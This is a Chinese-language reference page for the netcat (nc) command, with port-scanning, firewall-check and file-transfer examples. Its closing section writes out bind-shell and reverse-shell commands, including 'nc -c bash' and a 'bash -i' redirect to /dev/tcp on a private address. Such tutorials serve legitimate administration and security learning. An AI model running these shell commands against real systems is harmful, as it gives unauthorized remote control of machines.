nc
用于设置路由器,是网络工具中的瑞士军刀。
¶补充说明
nc命令 全称netcat,用于设置路由器。它能通过 TCP 和 UDP 在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用 netcat 命令所能完成的事情令人惊讶。
¶语法
nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>] |
¶选项
-g <网关> # 设置路由器跃程通信网关,最多可设置8个。 |
¶实例
TCP端口扫描[root@localhost ~]# nc -v -z -w2 192.168.0.3 1-100
192.168.0.3: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.3] 80 (http) open
(UNKNOWN) [192.168.0.3] 23 (telnet) open
(UNKNOWN) [192.168.0.3] 22 (ssh) open
扫描192.168.0.3 的端口 范围是 1-100
扫描UDP端口[root@localhost ~]# nc -u -z -w2 192.168.0.3 1-1000 # 扫描192.168.0.3 的端口 范围是 1-1000
扫描指定端口[root@localhost ~]# nc -nvv 192.168.0.1 80 # 扫描 80端口
(UNKNOWN) [192.168.0.1] 80 (?) open
y //用户输入
查看从服务器到目的地的出站端口 443 是否被防火墙阻止nc -vz acme-v02.api.letsencrypt.org 443 -w2
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 23.77.214.183:443.
Ncat: 0 bytes sent, 0 bytes received in 0.07 seconds.
文件传输接收方提前设置监听端口与要接收的文件名(文件名可自定义):
nc -lp 8888 > node.tar.gz
传输方发文件:
nc -nv 192.168.75.121 8888 < node_exporter-1.3.1.linux-amd64.tar.gz
⚠️ 注意:192.168.75.121是接收方的ip地址。如果希望文件传输结束后自动退出,可以使用下面的命令:
nc -lp 8888 > node.tar.gz
nc -nv 192.168.75.121 8888 -i 1 < node_exporter-1.3.1.linux-amd64.tar.gz
⚠️ 注意:-i 表示闲置超时时间
远程控制正向控制,被控端主动设置监听端口及bash环境,控制端连接,如果有防火墙,需开放端口,否则会被拦截。
被控制端执行下面的命令:
nc -lvnp 8888 -c bash
控制端执行下面的命令:
nc 192.168.75.121 8888反向控制,控制端设置监听端口,被控端主动连接控制端的ip及端口,并提供bash环境。
控制端执行下面的命令:
nc -lvnp 8888
被控制端执行下面的命令:
nc 192.168.75.121 8888 -c bash
反弹shell控制端执行下面的命令:
nc -lvnp 8888# 被控端执行下面的命令:
bash -i &> /dev/tcp/192.168.75.121/8888 0>&1